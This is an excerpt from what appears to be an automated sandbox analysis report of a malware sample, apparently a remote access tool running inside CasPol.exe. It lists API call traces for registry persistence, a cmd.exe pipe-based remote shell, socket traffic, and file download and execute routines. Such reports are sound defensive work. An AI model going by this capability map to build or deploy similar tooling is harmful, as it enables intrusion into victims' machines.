Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

HgF, xrefs: 00412703
pth_unenc, xrefs: 004126D6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: HgF$pth_unenc
API String ID: 1818849710-3662775637
Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

Strings

TUF, xrefs: 004127D9, 004127FB, 004127DC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: TUF
API String ID: 1818849710-3431404234
Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
GetLastError.KERNEL32 ref: 0040BEF1

Strings

(CG, xrefs: 0040BED7

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: (CG
API String ID: 1925916568-4210230975
Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
RegCloseKey.KERNELBASE(?), ref: 0041255F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
RegCloseKey.KERNELBASE(?), ref: 00412500

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Function 0044E1CE Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E1D2
_free.LIBCMT ref: 0044E20B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E212

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
Instruction ID: 604b519dfe4379e15ef5464dbc843faceff6e13584e6925da33daec4a3bd613e
Opcode Fuzzy Hash: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
Instruction Fuzzy Hash: A7E0E53714492026F211722B7C4AD6B2A1DEFC27B6B26002AF40492243EE298D0240FA

Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8

Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409531

Strings

xAG, xrefs: 00409561

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: xAG
API String ID: 176396367-2759412365
Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98

Function 0044B9CE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044B9EF

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

HeapReAlloc.KERNEL32(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED

Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277

CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18

Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7

Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47

__CxxThrowException@8.LIBVCRUNTIME ref: 00433E14

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID:
API String ID: 3476068407-0
Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E

Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
WSASetLastError.WS2_32(00000000), ref: 00413FC1

Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED

Function 0044EEC5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757

_free.LIBCMT ref: 0044EF31

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
Instruction ID: a7d529a76fd4b3acccd1592f2db4ae6b5003facb603dcc9161a9cd98b3869489
Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
Instruction Fuzzy Hash: A0012B722003046BF321CF6AC84195AFBD9FB85370F25051EE58453280EA346806C778

Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
Opcode Fuzzy Hash: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD

Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF

Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 00404277

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB

Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00426111

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

Function 0042611E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00426128

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

Non-executed Functions

Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406F28
GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
DeleteFileW.KERNEL32(00000000), ref: 00407018

Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
DeleteFileA.KERNEL32(?), ref: 004078CC

Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E

Sleep.KERNEL32(000007D0), ref: 00407976
StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA

Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C

Strings

>G, xrefs: 00406F54
Executing file: , xrefs: 0040742F
x@G, xrefs: 004076A6
Downloaded file: , xrefs: 004072A8
x@G, xrefs: 0040705B
x@G, xrefs: 00407563
Unable to delete: , xrefs: 00407078
x@G, xrefs: 00407998
Deleted file: , xrefs: 0040703A
Browsing directory: , xrefs: 004074B6
Failed to download file: , xrefs: 00407321
H@G, xrefs: 00407473
open, xrefs: 00407410
V>G, xrefs: 004071C6
Downloading file: , xrefs: 004071F3
Unable to rename file!, xrefs: 0040768F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
API String ID: 2918587301-599666313
Opcode ID: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
Opcode Fuzzy Hash: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B

Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040508E

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

__Init_thread_footer.LIBCMT ref: 004050CB
CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
TerminateProcess.KERNEL32(00000000), ref: 004053C1
CloseHandle.KERNEL32 ref: 004053CD
CloseHandle.KERNEL32 ref: 004053D5
CloseHandle.KERNEL32 ref: 004053E7
CloseHandle.KERNEL32 ref: 004053EF

Strings

p\G, xrefs: 00405202
p\G, xrefs: 00405332
SystemDrive, xrefs: 00405109
p\G, xrefs: 004053D7
p\G, xrefs: 00405078
cmd.exe, xrefs: 004050F5
(\G, xrefs: 00405183
p\G, xrefs: 004052FE

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
API String ID: 3815868655-1274243119
Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E

Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410F45

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6

Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500

CloseHandle.KERNEL32(00000000), ref: 00410F90

